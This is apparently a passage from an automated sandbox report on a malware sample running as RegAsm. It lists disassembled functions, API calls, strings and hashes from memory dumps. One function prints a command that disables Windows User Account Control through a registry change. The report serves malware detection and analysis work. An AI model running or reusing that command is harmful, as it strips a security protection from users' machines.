                                                                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                  Strings
                                                                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                  • API String ID: 2922976086-4183131282
                                                                                                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                                                  Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                                                  Function 10004B39 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHandleLibraryModule
                                                                                                                                  • String ID: CorExitProcess$fYM/$mscoree.dll
                                                                                                                                  • API String ID: 662261464-2800867290
                                                                                                                                  • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                  • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                  • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                  • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                  Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                  • String ID: KeepAlive | Disabled
                                                                                                                                  • API String ID: 2993684571-305739064
                                                                                                                                  • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                                  • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                                  Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                  • String ID: Alarm triggered
                                                                                                                                  • API String ID: 614609389-2816303416
                                                                                                                                  • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                                  • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                                  Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                                                                  Strings
                                                                                                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                  • API String ID: 3024135584-2418719853
                                                                                                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                                  Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                                  Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                  • _free.LIBCMT ref: 0044943D
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 00449609
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1286116820-0
                                                                                                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                                                  Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,P2), ref: 0041C08B
                                                                                                                                    • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,P2), ref: 0041C096
                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2180151492-0
                                                                                                                                  • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                  • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                  Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                  Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                                  • __freea.LIBCMT ref: 0045129D
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                  • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                  • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                  Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                  • _free.LIBCMT ref: 0044F43F
                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                  • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                  • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                  Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                  Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                  • _free.LIBCMT ref: 00448353
                                                                                                                                  • _free.LIBCMT ref: 0044837A
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                  • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                  • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                  Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
